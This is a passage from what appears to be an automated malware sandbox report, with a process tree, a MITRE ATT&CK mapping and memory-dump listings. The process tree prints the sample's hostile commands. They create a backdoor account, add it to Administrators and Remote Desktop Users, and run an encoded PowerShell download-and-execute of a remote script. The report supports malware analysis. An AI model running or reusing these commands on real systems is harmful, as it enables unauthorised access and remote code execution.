    PID:864

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:504
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:648

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    3⤵
    PID:3188

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1356
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3660

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc VuCbWcxs
1⤵
PID:2264
- C:\Windows\system32\net.exe
  net.exe user wgautilacc VuCbWcxs
  2⤵
  PID:2364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc VuCbWcxs
    3⤵
    PID:2720

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1808
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:3584

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:864
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:3648

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:648
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:3188

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:596
- C:\Windows\system32\net.exe
  net user wgautilacc 1234
  2⤵
  PID:516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 1234
    3⤵
    PID:2212

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/432-148-0x0000013E38CA3000-0x0000013E38CA5000-memory.dmp

Filesize
8KB

Download
memory/432-168-0x0000013E3B610000-0x0000013E3B611000-memory.dmp

Filesize
4KB

Download
memory/432-139-0x0000013E38BF0000-0x0000013E38BF1000-memory.dmp

Filesize
4KB

Download
memory/432-144-0x0000013E3AD80000-0x0000013E3AD81000-memory.dmp

Filesize
4KB

Download
memory/432-147-0x0000013E38CA0000-0x0000013E38CA2000-memory.dmp

Filesize
8KB

Download
memory/432-223-0x0000013E38CA8000-0x0000013E38CA9000-memory.dmp

Filesize
4KB

Download
memory/432-167-0x0000013E3B280000-0x0000013E3B281000-memory.dmp

Filesize
4KB

Download
memory/432-162-0x0000013E38CA6000-0x0000013E38CA8000-memory.dmp

Filesize
8KB

Download
memory/432-160-0x0000013E38C40000-0x0000013E38C41000-memory.dmp

Filesize
4KB

Download
memory/780-115-0x0000000000400000-0x0000000000496000-memory.dmp

Filesize
600KB

Download
memory/780-114-0x0000000002140000-0x00000000021D1000-memory.dmp

Filesize
580KB

Download
memory/3188-256-0x00000294D90C3000-0x00000294D90C5000-memory.dmp

Filesize
8KB

Download
memory/3188-257-0x00000294D90C6000-0x00000294D90C8000-memory.dmp

Filesize
8KB

Download
memory/3188-258-0x00000294D90C8000-0x00000294D90C9000-memory.dmp

Filesize
4KB

Download
memory/3188-255-0x00000294D90C0000-0x00000294D90C2000-memory.dmp

Filesize
8KB

Download
memory/3276-214-0x000001CE753F0000-0x000001CE753F2000-memory.dmp

Filesize
8KB

Download
memory/3276-218-0x000001CE753F8000-0x000001CE753FA000-memory.dmp

Filesize
8KB

Download
memory/3276-216-0x000001CE753F6000-0x000001CE753F8000-memory.dmp

Filesize
8KB

Download
memory/3276-215-0x000001CE753F3000-0x000001CE753F5000-memory.dmp

Filesize
8KB

Download
memory/3332-193-0x000001CA73206000-0x000001CA73208000-memory.dmp

Filesize
8KB

Download
memory/3332-213-0x000001CA73208000-0x000001CA7320A000-memory.dmp

Filesize
8KB

Download
memory/3332-187-0x000001CA73200000-0x000001CA73202000-memory.dmp

Filesize
8KB

Download
memory/3332-188-0x000001CA73203000-0x000001CA73205000-memory.dmp

Filesize
8KB

Download
memory/3724-129-0x0000024E5D070000-0x0000024E5D072000-memory.dmp

Filesize
8KB

Download
memory/3724-131-0x0000024E5D075000-0x0000024E5D076000-memory.dmp

Filesize
4KB

Download
memory/3724-132-0x0000024E5D076000-0x0000024E5D077000-memory.dmp

Filesize
4KB

Download
memory/3724-130-0x0000024E5D073000-0x0000024E5D075000-memory.dmp

Filesize
8KB

Download
memory/3724-127-0x0000024E5D4B0000-0x0000024E5D8D1000-memory.dmp

Filesize
4.1MB

Download
memory/3848-219-0x000001A2D3920000-0x000001A2D3922000-memory.dmp

Filesize
8KB

Download
memory/3848-222-0x000001A2D3928000-0x000001A2D392A000-memory.dmp

Filesize
8KB

Download
memory/3848-221-0x000001A2D3926000-0x000001A2D3928000-memory.dmp

Filesize
8KB

Download
memory/3848-220-0x000001A2D3923000-0x000001A2D3925000-memory.dmp

Filesize
8KB

Download